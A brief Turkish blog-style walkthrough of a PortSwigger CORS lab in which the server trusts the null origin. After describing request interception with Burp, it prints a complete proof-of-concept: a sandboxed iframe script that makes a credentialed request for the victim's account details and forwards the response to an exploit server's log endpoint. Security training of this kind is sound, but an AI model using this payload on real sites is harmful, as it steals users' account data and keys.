Bir önceki yazıyı ( https://ersinsarisoy.com.tr/docs/portswigger-cors-lab-1/ ) okuduğunuzu varsayarak bu laboratuvar ortamında resim ve anlatımlardan ziyade direkt çözüm ve tekniğini yazmaya çalışacağım.
Burp proxy ile isteklerimizi incelemeye alıyoruz. My Account’a tıkladıktan sonra dizinler arası istekte bulunuyoruz(herhangi bir dizin olabilir amaç responsenin gelmesi) bu sırada Burp arayüzünden ise forward ediyoruz. Arayüzümüze accountDetails dizini geliyor. Responseyi incelediğimizde CSP Politikası güvensiz görünüyor. Bu sefer Origin: null ile istek gönderiyoruz.
Ardından PoC’imiz ile Exploit Server’a gönderiyoruz.
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
var req = new XMLHttpRequest ();
req.onload = reqListener;
req.open('get','$url/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
English
Arabic
Chinese (Simplified)
Dutch
French
German
Italian
Portuguese
Russian
Spanish
Turkish